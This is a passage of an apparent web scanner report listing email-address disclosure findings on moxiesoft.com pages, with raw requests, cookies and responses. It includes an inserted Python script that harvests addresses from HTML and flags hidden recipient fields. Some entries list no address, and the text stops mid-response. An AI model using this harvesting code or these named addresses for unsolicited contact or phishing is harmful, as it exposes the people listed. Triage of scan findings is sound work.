Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.144. http://www.moxiesoft.com/tal_news/events-resources.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/events-resources.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/events-resources.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.145. http://www.moxiesoft.com/tal_news/press_release.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/press_release.aspx

Issue detail

The following email addresses were disclosed in the response:

kristi@kilpatrick-pr.com
info@moxiesoft.com

Request

GET /tal_news/press_release.aspx?id=3530 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45860


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a href="mailto:kristi@kilpatrick-pr.com">kristi@kilpatrick-pr.com</a>
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.146. http://www.moxiesoft.com/tal_news/press_release.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/press_release.aspx

Issue detail

The following email addresses were disclosed in the response:

areichert@ngenera.com
areichert@moxiesoft.com
info@moxiesoft.com

Request

GET /tal_news/press_release.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="areichert@ngenera.com" href="mailto:areichert@moxiesoft.com">areichert@moxiesoft.com</a>
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.147. http://www.moxiesoft.com/tal_news/press_room.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/press_room.aspx

Issue detail

The following email addresses were disclosed in the response:

areichert@ngenera.com
areichert@moxiesoft.com
info@moxiesoft.com

Request

GET /tal_news/press_room.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="areichert@ngenera.com" href="mailto:areichert@moxiesoft.com">areichert@moxiesoft.com</a>
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.148. http://www.moxiesoft.com/tal_news/webinars/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/webinars/default.aspx

Issue detail

The following email addresses were disclosed in the response:

cimleads@ngenera.com
tpiccione@moxiesoft.com
info@moxiesoft.com

Request

GET /tal_news/webinars/default.aspx?id=3436 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 82954


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<input type="hidden" name="send_to" value="cimleads@ngenera.com">
   <input type="hidden" name="cc_to" value="tpiccione@moxiesoft.com">
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...
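Added example, not part of the scanner report and not code from the site it was run against: a small Python check that reproduces the "email addresses disclosed" finding behind the entries in this section. It pulls every address out of an HTTP response body and records where each one sat, so that a recipient address in a hidden form field (the send_to and cc_to inputs visible in 21.140, 21.141 and 21.148) stands out from an ordinary mailto: contact link. The page does not show the handler those forms post to, so the check only flags such fields for manual review; it does not claim the server honours a client-supplied recipient. The RECIPIENT_FIELD_NAMES set is an assumption (send_to and cc_to come from the page, the other names are plausible variants), and SAMPLE_BODY is constructed from the response snippets above.

```python
import re
from html.parser import HTMLParser

# Added example: re-implements the "email addresses disclosed" check, with
# context per address so hidden recipient fields are distinguishable from
# mailto: links. Not the scanner's own code and not the scanned site's code.

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")

# Assumption: hidden-input names that usually carry a mail recipient. send_to
# and cc_to appear on the page; the remaining names are plausible variants.
RECIPIENT_FIELD_NAMES = {"send_to", "cc_to", "bcc_to", "to", "recipient", "mailto"}


class _EmailExtractor(HTMLParser):
    """Collects addresses from mailto: hrefs, title attributes, text nodes and hidden inputs."""

    def __init__(self):
        super().__init__()
        self.found = {}        # lower-cased email -> set of context labels
        self.recipients = []   # (input name, email) for hidden recipient-looking fields

    def _add(self, email, context):
        self.found.setdefault(email.lower(), set()).add(context)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a":
            if a.get("href", "").lower().startswith("mailto:"):
                for m in EMAIL_RE.findall(a["href"]):
                    self._add(m, "mailto-href")
            for m in EMAIL_RE.findall(a.get("title", "")):
                self._add(m, "title-attr")
        elif tag == "input" and a.get("type", "").lower() == "hidden":
            name = a.get("name", "")
            for m in EMAIL_RE.findall(a.get("value", "")):
                self._add(m, "hidden-input:" + name)
                if name.lower() in RECIPIENT_FIELD_NAMES:
                    self.recipients.append((name, m.lower()))

    def handle_data(self, data):
        for m in EMAIL_RE.findall(data):
            self._add(m, "text")


def _parse(html):
    p = _EmailExtractor()
    p.feed(html)
    p.close()
    return p


def find_emails(html):
    """Return {email: {context labels}} for every address in the response body."""
    return _parse(html).found


def recipient_fields(html):
    """Return [(field name, email)] for hidden inputs that look like mail recipients.

    Whether the server honours a client-supplied value in these fields is not
    something the response alone can tell you; this only marks them for review."""
    return _parse(html).recipients


def issue_detail(html):
    """Render the one-line finding the scanner prints under 'Issue detail'."""
    emails = sorted(find_emails(html))
    if not emails:
        return "No email addresses were disclosed in the response."
    noun = "address was" if len(emails) == 1 else "addresses were"
    return "The following email %s disclosed in the response: %s" % (noun, ", ".join(emails))


# Constructed sample, assembled from the response snippets shown in this section.
SAMPLE_BODY = """<html><body>
<input type="hidden" name="send_to" value="cimleads@ngenera.com">
<input type="hidden" name="cc_to" value="tpiccione@moxiesoft.com">
<a title="areichert@ngenera.com" href="mailto:areichert@moxiesoft.com">areichert@moxiesoft.com</a>
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
</body></html>"""

if __name__ == "__main__":
    print(issue_detail(SAMPLE_BODY))
    for email, contexts in sorted(find_emails(SAMPLE_BODY).items()):
        print("  %-28s %s" % (email, ", ".join(sorted(contexts))))
    for name, email in recipient_fields(SAMPLE_BODY):
        print("REVIEW hidden recipient field %s=%s" % (name, email))
```

Run against a saved response body, the output distinguishes a public contact link (info@moxiesoft.com, seen as mailto-href, title-attr and text) from an address that only exists inside a hidden form field, which is the case worth a second look when triaging an Information-severity finding like the ones above.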

21.149. http://www.moxiesoft.com/tal_news/webinars_events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/webinars_events.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/webinars_events.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.150. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_news/webinars_recorded.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_news/webinars_recorded.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40917


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.151. http://www.moxiesoft.com/tal_products/answer.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/answer.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/answer.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38434


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.152. http://www.moxiesoft.com/tal_products/chat.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat.aspx?ac=PPC.B.live%20chat HTTP/1.1
Host: www.moxiesoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 13:58:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=elqucae4pira41q1xauy2i45; path=/; HttpOnly
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; path=/
Set-Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; expires=Sat, 28-Jan-2012 13:58:55 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.153. http://www.moxiesoft.com/tal_products/chat_benefits.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat_benefits.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat_benefits.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39508


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.154. http://www.moxiesoft.com/tal_products/chat_tour.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat_tour.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat_tour.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44125


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.155. http://www.moxiesoft.com/tal_products/chat_tour2.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/chat_tour2.aspx

Issue detail

The following email address was disclosed in the response:

info@moxiesoft.com

Request

GET /tal_products/chat_tour2.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.156. http://www.moxiesoft.com/tal_products/clicktocall.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/clicktocall.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/clicktocall.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.157. http://www.moxiesoft.com/tal_products/cobrowse.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/cobrowse.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/cobrowse.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<a title="info@moxiesoft.com" href="mailto:info@moxiesoft.com">info@moxiesoft.com</a>
...[SNIP]...

21.158. http://www.moxiesoft.com/tal_products/collaboration.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /tal_products/collaboration.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /tal_products/collaboration.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
